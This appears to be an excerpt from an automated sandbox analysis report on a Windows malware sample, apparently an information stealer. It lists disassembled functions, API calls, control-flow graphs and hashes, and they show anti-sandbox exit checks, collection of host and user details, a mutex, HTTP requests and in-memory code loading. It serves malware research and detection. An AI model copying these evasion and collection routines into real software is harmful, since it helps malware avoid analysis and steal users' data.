                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                                                    • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                                                    • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                                                  • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                  • API String ID: 3630751533-2791005934
                                                                                  • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                                                  • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                                                  • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                                                  • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1090 417500-41754a GetWindowsDirectoryA 1091 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1090->1091 1092 41754c 1090->1092 1099 4175d8-4175df 1091->1099 1092->1091 1100 4175e1-4175fa call 418d00 1099->1100 1101 4175fc-417617 GetProcessHeap HeapAlloc 1099->1101 1100->1099 1103 417619-417626 call 41a740 1101->1103 1104 417628-417658 wsprintfA call 41a740 1101->1104 1111 41767e-41768e 1103->1111 1104->1111
                                                                                  APIs
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                                                  • wsprintfA.USER32 ref: 00417640
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                  • String ID: :$C$\
                                                                                  • API String ID: 3790021787-3809124531
                                                                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                  • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                  • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1112 b0003c-b00047 1113 b00049 1112->1113 1114 b0004c-b00263 call b00a3f call b00e0f call b00d90 VirtualAlloc 1112->1114 1113->1114 1129 b00265-b00289 call b00a69 1114->1129 1130 b0028b-b00292 1114->1130 1135 b002ce-b003c2 VirtualProtect call b00cce call b00ce7 1129->1135 1131 b002a1-b002b0 1130->1131 1134 b002b2-b002cc 1131->1134 1131->1135 1134->1131 1141 b003d1-b003e0 1135->1141 1142 b003e2-b00437 call b00ce7 1141->1142 1143 b00439-b004b8 VirtualFree 1141->1143 1142->1141 1144 b005f4-b005fe 1143->1144 1145 b004be-b004cd 1143->1145 1148 b00604-b0060d 1144->1148 1149 b0077f-b00789 1144->1149 1147 b004d3-b004dd 1145->1147 1147->1144 1153 b004e3-b00505 LoadLibraryA 1147->1153 1148->1149 1154 b00613-b00637 1148->1154 1151 b007a6-b007b0 1149->1151 1152 b0078b-b007a3 1149->1152 1156 b007b6-b007cb 1151->1156 1157 b0086e-b008be LoadLibraryA 1151->1157 1152->1151 1158 b00517-b00520 1153->1158 1159 b00507-b00515 1153->1159 1160 b0063e-b00648 1154->1160 1161 b007d2-b007d5 1156->1161 1164 b008c7-b008f9 1157->1164 1162 b00526-b00547 1158->1162 1159->1162 1160->1149 1163 b0064e-b0065a 1160->1163 1165 b00824-b00833 1161->1165 1166 b007d7-b007e0 1161->1166 1167 b0054d-b00550 1162->1167 1163->1149 1168 b00660-b0066a 1163->1168 1169 b00902-b0091d 1164->1169 1170 b008fb-b00901 1164->1170 1176 b00839-b0083c 1165->1176 1171 b007e2 1166->1171 1172 b007e4-b00822 1166->1172 1173 b005e0-b005ef 1167->1173 1174 b00556-b0056b 1167->1174 1175 b0067a-b00689 1168->1175 1170->1169 1171->1165 1172->1161 1173->1147 1177 b0056d 1174->1177 1178 b0056f-b0057a 1174->1178 1179 b00750-b0077a 1175->1179 1180 b0068f-b006b2 1175->1180 1176->1157 1181 b0083e-b00847 1176->1181 1177->1173 1183 b0059b-b005bb 1178->1183 1184 b0057c-b00599 1178->1184 1179->1160 1185 b006b4-b006ed 1180->1185 1186 b006ef-b006fc 1180->1186 1187 b00849 1181->1187 1188 b0084b-b0086c 1181->1188 1195 b005bd-b005db 1183->1195 1184->1195 1185->1186 1189 b0074b 1186->1189 1190 b006fe-b00748 1186->1190 1187->1157 1188->1176 1189->1175 1190->1189 1195->1167
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00B0024D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID: cess$kernel32.dll
                                                                                  • API String ID: 4275171209-1230238691
                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                  • Instruction ID: 293467810f54ff19ff41081e7c88459f5451543b860974326a3aab944536eba1
                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                  • Instruction Fuzzy Hash: 32526974A11229DFDB64CF58C984BA8BBB1BF09304F1480E9E54DAB391DB30AE95DF14

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D7FD8), ref: 004198A1
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D8038), ref: 004198BA
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D8068), ref: 004198D2
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D8098), ref: 004198EA
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D80B0), ref: 00419903
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00904578), ref: 0041991B
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D3010), ref: 00419933
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D2FF0), ref: 0041994C
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D80F8), ref: 00419964
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00905D90), ref: 0041997C
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00905D60), ref: 00419995
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00905B68), ref: 004199AD
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D2DB0), ref: 004199C5
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00905CE8), ref: 004199DE
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                                                    • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                                                    • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                                                    • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                                                    • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                                                    • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                                                    • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                                                    • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                                                    • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                                                    • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009045D8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                                                  • CloseHandle.KERNEL32(?,00000000,?,009045D8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3511611419-0
                                                                                  • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                                                  • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                                                  • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                                                  • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ??2@$CrackInternetlstrlen
                                                                                  • String ID: <
                                                                                  • API String ID: 1683549937-4251816714
                                                                                  • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                                                  • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                                                  • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                                                  • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1261 401220-401247 call 4189b0 GlobalMemoryStatusEx 1264 401273-40127a 1261->1264 1265 401249-401271 call 41da00 * 2 1261->1265 1266 401281-401285 1264->1266 1265->1266 1268 401287 1266->1268 1269 40129a-40129d 1266->1269 1271 401292-401294 ExitProcess 1268->1271 1272 401289-401290 1268->1272 1272->1269 1272->1271
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                  • __aulldiv.LIBCMT ref: 00401258
                                                                                  • __aulldiv.LIBCMT ref: 00401266
                                                                                  • ExitProcess.KERNEL32 ref: 00401294
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 3404098578-2766056989
                                                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                  • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                  • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                                                  Control-flow Graph

                                                                                  Basic blocks (graph image not recoverable; node id: address range, calls -> successors):
                                                                                  • 1275: 416af3 -> 1276
                                                                                  • 1276: 416b0a -> 1278, 1279
                                                                                  • 1278: 416aba-416ad7, call 41aad0, OpenEventA -> 1285, 1286
                                                                                  • 1279: 416b0c-416b22, call 416920, call 415b10, CloseHandle, ExitProcess
                                                                                  • 1285: 416af5-416b04, CloseHandle, Sleep -> 1276
                                                                                  • 1286: 416ad9-416af1, call 41aad0, CreateEventA -> 1279
                                                                                  APIs
                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009045D8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                                                  • CloseHandle.KERNEL32(?,00000000,?,009045D8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                  • String ID:
                                                                                  • API String ID: 941982115-0
                                                                                  • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                                                  • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                                                  • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                                                  • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00906260), ref: 00406303
                                                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0090B380,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                  • String ID: ERROR$ERROR
                                                                                  • API String ID: 3287882509-2579291623
                                                                                  • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                                                  • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                                                  • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                                                  • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                  • String ID:
                                                                                  • API String ID: 4203777966-0
                                                                                  • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                                                  • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                                                  • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                                                  • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                                                  • ExitProcess.KERNEL32 ref: 00401143
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1103761159-0
                                                                                  • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                                                  • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                                                  • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                                                  • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008D9F6E
                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 008D9F8E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D9000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8d9000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3833638111-0
                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                  • Instruction ID: 8ffc3f8a1fd60fd1c4ea775d1234e998db5f7c8924b3067a5c16e87f7cac0b3f
                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                  • Instruction Fuzzy Hash: 5FF062322007156FD7203BF9D88DA6E77ECFF89725F10062AE686D11C0DB70E8454661
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,00B00223,?,?), ref: 00B00E19
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,00B00223,?,?), ref: 00B00E1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
